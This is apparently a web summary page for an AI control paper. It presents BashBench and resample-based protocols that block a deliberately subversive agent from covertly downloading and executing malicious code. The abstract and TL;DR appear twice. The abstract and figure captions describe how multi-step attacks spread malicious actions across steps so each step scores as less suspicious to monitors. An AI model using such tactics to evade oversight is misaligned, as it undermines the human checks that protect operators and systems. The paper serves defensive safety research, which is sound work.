Table of Contents
Fetching ...

Ctrl-Z: Controlling AI Agents via Resampling

Aryan Bhatt, Cody Rushing, Adam Kaufman, Tyler Tracy, Vasil Georgiev, David Matolcsi, Akbir Khan, Buck Shlegeris

TL;DR

The paper tackles safety in autonomous AI agents operating over multi-step tasks by introducing BashBench, a 257-task multi-step dataset derived from Unix Sysadmin problems. It extends AI control evaluations to sequential settings and presents resample-based control protocols that dynamically draw multiple completions to deter covert attacks while preserving task usefulness. Through iterative blue/red team experiments, the authors show resampling approaches—especially ones using past information and incrimination—achieve strong safety gains (up to 87.1% at 95% usefulness) with limited cost. The work also analyzes untrusted monitoring and anti-collusion strategies, showing these can further tighten the safety-usefulness frontier, and discusses limitations and future directions for longer trajectories and imperfect auditing.

Abstract

Control evaluations measure whether monitoring and security protocols for AI systems prevent intentionally subversive AI models from causing harm. Our work presents the first control evaluation performed in an agent environment. We construct BashBench, a dataset of 257 challenging multi-step system administration tasks, and evaluate whether various safety measures can prevent an adversarially constructed AI agent from covertly downloading and executing malicious code in this environment. This multi-step setting introduces new attack and defense dynamics, which we investigate in order to design novel control protocols that prevent safety failures without hindering the ability of non-malicious agents to perform useful work. We introduce a class of control protocols called resample protocols that dynamically take additional samples of certain actions. We find these protocols significantly improve on existing techniques by selectively blocking the AI agent from executing suspicious code and incriminating the agent by generating additional examples of dangerous behavior. We measure the tradeoff between attack prevention and usefulness; our best protocol combines resampling with analysis of previous steps, reducing the success rate of attacks from 58% to 7% at a 5% cost to the performance of a non-malicious agent.

Ctrl-Z: Controlling AI Agents via Resampling

TL;DR

The paper tackles safety in autonomous AI agents operating over multi-step tasks by introducing BashBench, a 257-task multi-step dataset derived from Unix Sysadmin problems. It extends AI control evaluations to sequential settings and presents resample-based control protocols that dynamically draw multiple completions to deter covert attacks while preserving task usefulness. Through iterative blue/red team experiments, the authors show resampling approaches—especially ones using past information and incrimination—achieve strong safety gains (up to 87.1% at 95% usefulness) with limited cost. The work also analyzes untrusted monitoring and anti-collusion strategies, showing these can further tighten the safety-usefulness frontier, and discusses limitations and future directions for longer trajectories and imperfect auditing.

Abstract

Control evaluations measure whether monitoring and security protocols for AI systems prevent intentionally subversive AI models from causing harm. Our work presents the first control evaluation performed in an agent environment. We construct BashBench, a dataset of 257 challenging multi-step system administration tasks, and evaluate whether various safety measures can prevent an adversarially constructed AI agent from covertly downloading and executing malicious code in this environment. This multi-step setting introduces new attack and defense dynamics, which we investigate in order to design novel control protocols that prevent safety failures without hindering the ability of non-malicious agents to perform useful work. We introduce a class of control protocols called resample protocols that dynamically take additional samples of certain actions. We find these protocols significantly improve on existing techniques by selectively blocking the AI agent from executing suspicious code and incriminating the agent by generating additional examples of dangerous behavior. We measure the tradeoff between attack prevention and usefulness; our best protocol combines resampling with analysis of previous steps, reducing the success rate of attacks from 58% to 7% at a 5% cost to the performance of a non-malicious agent.

Paper Structure

This paper contains 48 sections, 3 equations, 6 figures, 2 tables.

Figures (6)

  • Figure 1: An illustration of our setting. An untrusted model – implemented either as an honest policy or an attack policy – solves tasks across an episode. The blue team’s control protocol may audit or resample commands that appear dangerous. See examples of a full trajectory http://bashcontrol.com/logs and tasks http://bashcontrol.com/tasks.
  • Figure 2: The Pareto frontier of usefulness and safety of a collection of protocols. For protocols that defer, we plot multiple deferral thresholds as points, and plot the rolling averages of usefulness and safety. Usefulness scores are normalized by the usefulness of non-deferring protocols.
  • Figure 3: We plot the usefulness of different protocols based on their defer threshold. A defer threshold of 80% means that if an action is rated as more suspicious than 80% of $U_H$’s actions, then a deferral will occur. Choosing a lower defer threshold decreases the chance an attack is executed by the control protocol but hurts usefulness. At most thresholds, Defer to trusted hurts usefulness more than Defer to resample.
  • Figure 4: (Left) Suspiciousness scores of our best Single-Step and Multi-Step Attack on 100 attack attempts. The fifth step of the Multi-Step attack is one of the most suspicious of the Multi-Step attack but is still less suspicious than the Single-Step attack. (Middle) We plot the expected number of steps until attack completion vs. the attack probability of an attack under Defer to trusted and Defer to resample of equivalent usefulness level. The left and middle plots depict data from experiments run on the train set. (Right) We plot the distribution of suspiciousness scores for innocent and attack actions. Top: Without resampling. Bottom: Minimum of the scores from a resampling procedure with up to six resamples per action. Vertical lines indicate the 99th percentile of the innocent distribution, above which the blue team audits.
  • Figure 5: The safety-usefulness pareto curves for a collection of protocols at a 0.3% auditing budget (top), a 1% auditing budget (middle, same as Figure \ref{['fig:paretocurve']}), and a 3% auditing budget (bottom).
  • ...and 1 more figures